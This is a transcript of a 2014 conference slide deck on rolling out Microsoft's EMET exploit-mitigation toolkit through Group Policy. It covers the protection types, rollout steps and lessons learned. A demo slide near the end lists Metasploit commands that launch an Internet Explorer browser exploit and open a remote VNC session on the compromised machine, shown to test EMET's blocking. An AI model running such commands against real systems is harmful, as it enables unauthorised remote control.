Download - Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

Transcript
Page 1: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

Like what you hear? Tweet it using: #Sec360 5/13/2014

Page 2: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

PRESENTATION Overview

Technical details

Testing

Rolling out in a Corporate Environment

Troubleshooting

Lessons Learned

Tips for Maximum security settings

Demo!

Trademarks owned by their respective owners

Page 3: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

WHY RUN EMET? Do you have top notch anti-malware?

Are your PCs still being exploited? § No Anti-malware product is 100% effective § Zero-day exploits for IE / Flash / Adobe Reader / Java / etc…

Would you like to improve your odds?

Page 4: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

SELLING EMET EMET Software:

Blocks “zero-day” malware exploits

Supplements existing anti-malware

Supported by Microsoft

Uses group policy

Minimal overhead

But wait, there’s more…

It’s FREE!!!

Page 5: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

OK, WHAT IS EMET EMET: Enhanced Mitigation Experience Toolkit

A free software package from Microsoft § Available since 2009 / officially supported since 2011 § Current version is 4.1 (& 5.0 preview)

Blocks memory corruption /buffer overflow exploits § Example: it randomizes memory locations

Low overhead: Uses the Application Compatibility Framework, rather than running as a program § No need to recompile applications

Install on every workstation

Page 6: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

WHY RUN EMET? Because Microsoft recommends it:

4/26/2014 - Microsoft KB2963983 IE Vulnerability – “Workarounds […] Deploy the Enhanced Mitigation Experience Toolkit”

3/24/2014 – Microsoft SRD2953095 Word Vulnerability – “our tests showed that EMET default configuration can block the exploits seen in the wild.”

3/11/2014 – Microsoft MS14-012 IE Vulnerability – “Does EMET help mitigate attacks that could attempt to exploit these vulnerabilities? Yes.”

7/28/2010 – Microsoft FF859539 IE Aurora Vulnerability – “EMET can help prevent successful exploitation on systems lacking the update.”

… and it blocks many more for Flash / Adobe Reader / Java / etc…

Page 7: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

WHERE IT WORKS BEST Workstations typically get infected in two ways:

1.  Workstation has vulnerable software § E.g. Unpatched/zero-day Adobe, Java, Office, Browser Plug-ins § Users visit automated exploit web site, or open bad email document

-> Install EMET

2.  Users get tricked into running bad software §  Payroll.exe, UPS-Tracking.zip, FakeAV.com

-> Train Users, EMET less effective

* In addition to other mitigations such as anti-malware

Page 8: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TECHNICAL: PROTECTION OVERVIEW Three Types of Protection:

1.  System Wide § Programs can be coded to opt-in or opt-out

2.  Per-Program § Enforces protection on specific programs

3.  Per-Web-Site § Alerts users to fraudulent SSL/TLS certificates

Page 9: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TECHNICAL: 1. SYSTEM-WIDE 1. System Wide Protections:

DEP - Data Execution Prevention § Marks data (heap/stack) memory as non-executable § Requires support by the CPU (Intel=XD, AMD=NX)

SEHOP – Exception Handling § OS walks exception chain to validate before using it

ASLR – Address Randomization § Use different memory locations each boot

Page 10: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TECHNICAL: 1. SYSTEM-WIDE 1. System-Wide Protection Options: DEP / SEHOP/ASLR

Always On – All programs will use

Opt-Out – On except if program is written to opt-out

Opt-In – Off except if program is written to opt-in

Disabled – No programs will use

Opt-In vs. Opt-Out depends on risk tolerance/resources

Opt-In is the Microsoft recommendation § Less protection, but less compatibility issues

Page 11: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TECHNICAL: 2. PER-PROGRAM 2. Per-program Protection Options:

Memory Protections: § DEP / Bottom-Up ASLR / Mandatory ASLR / Heap Spray (blocks

common locations) / Null Page Return Oriented Programming (ROP): §  Load Library checks (no UNC DLL calls)/ Memory protection checks

(disallow stack executable) / Caller Checks (critical functions only via “call” not “return”) / Stack Pivot (detect if stack pivoted)/ Simulate execution flow (detect ROP gadgets)

Other: §  SEHOP / EAF (Export Address table Filtering - blocks API address

lookup) /ASR (Attack Surface Reduction in v5.0, blocks specific plugins)

Note: Any protection applied to a browser protects all its plug-ins too

Page 12: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TECHNICAL: 3. CERTIFICATE TRUST 3. Per-web-site (v4): Certificate Trust Pinning � Deters an attacker from using a compromised certificate vendor to

intercept traffic (DigiNotar/Google) in IE § E.g. https://www.facebook.com can only use DigiCert/Equifax/

GeoTrust/Thawte/VeriSign certs § Config: MS / Yahoo / Skype / Twitter /Facebook § Might require maintenance with non-MS entries § Can specify expiration date, allow same country, etc.

Only warns users, doesn’t block

Not configurable by group policy

Page 13: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

… CERTIFICATE TRUST

Example:

Certificate Trust Pinning https://www.facebook.com

Certificate Authority must be: DigiCert/Equifax/GeoTrust/ Thawte/VeriSign

E.g. but not DigiNotar

Page 14: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TESTING ON A PC

Install Microsoft .Net 4.0 (& KB 2790907 on Win 8/2012)

Download EMET from http://microsoft.com/emet

Install §  It will ask if you want Recommended Settings §  If no configuration is done, EMET doesn’t protect

Page 15: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

…TESTING ON A PC DEMO

Install

Start GUI

Settings §  System-Wide § Always On / App Opt-Out / App Opt-In / Disabled

§ Per-program § v3 / ROP / Mitigation Settings § Manually Adding

§ Web Certificate CA Pinning

Page 16: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

…TESTING ON A PC Start up the GUI:

Start Menu -> EMET -> EMET GUI

Sample Test Settings:

DEP: Opt In

SEHOP: Opt In

ASLR: Opt In

Pinning: Enabled

Page 17: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

…TESTING ON A PC Import per-Application & Cert Pinning Settings:

Import -> Popular § Popular has more than

Recommended

Import -> CertTrust § Contains SSL/TLS certificate

pinning rules for a few web sites

Page 18: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION
Page 19: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION
Page 20: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

ROLLING OUT: PREP Download EMET (& .Net 4) §  http://www.microsoft.com/emet

Extract Group Policy ADM* files §  msiexec /a "EMET Setup.msi" /qb TARGETDIR="c:\temp“

§  (or copy from the EMET directory if EMET is already installed)

Install Group Policy ADM* files §  Only needed on machines that will modify group policy §  Copy EMET.admx and EMET.adml in c:\temp\group policy files to \Windows

\PolicyDefinitions (admx), \Windows\PolicyDefinitions\en-US (adml) §  Note: ADM* files different for each EMET version – use current ones

Page 21: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

ROLLING OUT: ACTIVE DIRECTORY

Note: Create a test OU container for each department / drag and drop PC

Page 22: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

ROLLING OUT: SETTINGS

Note: Create a Group Policy Object, then link to each Test OU container

Page 23: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

ROLLING OUT: SETTINGS

Note: IE, Popular, and Recommended Software are not similar

Page 24: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

ROLLING OUT: SETTINGS

Include a shutdown script to apply the group policy: EMET_Conf --refresh

Page 25: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

ROLLING OUT: SOFTWARE Roll out .Net 4.0 (& KB 2790907 on Win 8/2012)

Roll out EMET using Group Policy or other method

Page 26: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TROUBLESHOOTING EMET notification: Popup Window

OS Application log: § Office Plug-ins

also produce an Application Error, search disk for the module

Page 27: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

EMET V4 KNOWN ISSUES Group Policy settings don’t display properly in EMET GUI § Commands that will display them:

emet-conf --list reg query HKLM\Software\Policies\Microsoft\EMET

\SysSettings

Certificate Trust Pinning limitations: § EMET Group Policy doesn’t contain those settings § Not available for the “Modern” IE app in Windows 8

Review the included EMET User’s Guide and the EMET web forum for additional caveats

Page 28: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

LESSONS LEARNED 1.  DEP breaks legacy applications § Roll out EMET to enterprise in phases §  Set the system-wide DEP: Opt-in, not Always-on § E.g. breaks end-of-life versions of Crystal Reports

§ Can individually configure workstations to opt-out of DEP for a specific application if you set DEP to Opt-in § Computer Properties / Advanced /Performance / DEP

§ Can use the free Microsoft Application Compatibility Toolkit to create a “shim” to roll out for the application to opt-out of 32-bit DEP § Compatibility Fix setting: “Disable NX”

Page 29: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

LESSONS LEARNED 2.  Apply Group Policy settings before installing §  Settings didn’t always apply afterwards § Can get the settings to apply by adding a Group Policy shutdown

script to run “emet_conf --refresh”

3.  Uninstalling EMET doesn’t revert system-wide changes (DEP) § Revert system-wide changes then uninstall § Tools - Windows 7: bcdedit § Possible BitLocker issue with DEP changes

4.  IE developers may need EAF disabled for IE, WinZip may need update for Outlook plugin compatibility

Page 30: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

LESSONS LEARNED: THE GOOD POINTS 5.  Office/IE issues only starting/closing application § A non-compatible add-in, one user a week issue § Users claim no impact on them § Yes, seriously – I asked twice

6.  Fun to get notified if logging workstations centrally § Malware tends to give

multiple EMET alerts

Page 31: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

TIPS FOR EXTRA SECURITY Microsoft’s recommendation for Windows 7: §  “Opt-in” for System-wide settings §  “Recommended Software” (IE/Office/Adobe/Java) for Per-application settings

A better recommendation: §  Add “Popular Software” for Per-application settings §  Adds other applications such as Firefox and Chrome web browsers §  Big bang for the buck with minimal issues – DO IT!

Maximum settings: Not a recommendation with legacy software §  “Opt-out” for System-wide settings (“Always On” won’t allow fixes to work) §  Breaks DEP with 32-bit legacy applications – Possibly not worth extra effort

§  Create and deploy “shims” to fix the applications

Page 32: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

REFERENCES Microsoft EMET Homepage §  www.microsoft.com/emet §  Download link has the User Guide

EMET Support Forum §  social.technet.microsoft.com/Forums/security/en-US/home?forum=emet

Microsoft Videos §  Tech: technet.microsoft.com/en-us/security/ff859539.aspx § Non-Tech: http://aka.ms/pjyesw §  EMET 4.1/5.0 TP: http://technet.microsoft.com/en-us/security/jj653751

Page 33: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

EMET PROTECTION DEMO DEMO

Testing EMET using Metasploit w/ Armitage GUI §  Systems:

§ Windows 7 § Metasploit /Armitage on Kali 1.0 (~BackTrack)

§ Msfupdate, Kali/System/Metasploit/Start, Kali/Exploit/Net/Armitage §  Exploit:

§  (Kali) use exploit/windows/browser/ms11_003_ie_css_import §  set SRVPORT=80 /set URIPATH=funny §  exploit –j

§  (Win7) Browse to http://server/funny §  (Kali/Console) sessions / session -i 1 / run vnc

Page 34: Like what you hear? Tweet it using: #Sec360 …secure360.org/wp-content/uploads/2014/05/Blocking...2014/05/13  · Like what you hear? Tweet it using: #Sec360 5/13/2014 PRESENTATION

QUESTIONS? Contact:

Chris Covington, CISSP

[email protected]